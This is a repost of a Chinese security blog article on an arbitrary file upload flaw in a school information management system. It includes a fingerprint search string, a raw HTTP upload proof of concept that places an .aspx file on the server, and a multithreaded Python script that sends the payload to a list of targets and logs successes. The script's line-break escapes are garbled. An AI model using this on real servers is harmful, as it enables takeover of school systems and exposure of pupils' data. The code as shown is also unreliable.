PART.02
新中新中小学智慧校园信息管理系统PSE存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
body="/Login/IndexMobi"
全版本
POC:
POST /PSE/Upload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 147
Connection: close
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="test.aspx"
Content-Type: image/jpg
123
--00content0boundary00--
真实文件名:
拼接访问:
/Upload/PrimarySchoolEnrollment/3accfc2c-efd1-4ccb-8ed5-0d76b6a2a908.aspx
插个广告,道一安全Python安全工具开发目前正在预售,下周一也就是7.22号开课,一次付费永久学习(后面开二期三期...也可以继续免费学习),仅限第一期学员福利。目前公开预售价269,要报名的同学添加微信详细咨询。
课时大概最少20天。
写了个简单的多线程批量检测脚本:
import requests
import threading
def run_poc(url):
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"Content-Type": "multipart/form-data; boundary=00content0boundary00",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "close"
}
# 构建multipart/form-data
data = (
"--00content0boundary00rn"
'Content-Disposition: form-data; name="file"; filename="test.aspx"rn'
"Content-Type: image/jpgrnrn"
"123rn"
"--00content0boundary00--rn"
)
response = requests.post(url + '/PSE/Upload', headers=headers, data=data, verify=False).json()
try:
if response['Success']:
open('success.txt', 'a+').write(url + '/Upload/PrimarySchoolEnrollment/' + response['SaveName'] + 'n')
except:
pass
# url.txt内放目标 一行一个 不加协议默认http 上传成功自动存到success.txt内
for url in open('urls.txt', 'r'):
url = url.replace('n', '')
if url.find('http://') == -1 and url.find('https://') == -1: url = 'http://' + url
threading.Thread(target=run_poc, args=[url, ]).start()
# Run_Poc(url)
原文始发于微信公众号(道一安全):【漏洞复现】智慧校园信息管理系统存在任意文件上传漏洞 附批量检测脚本
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论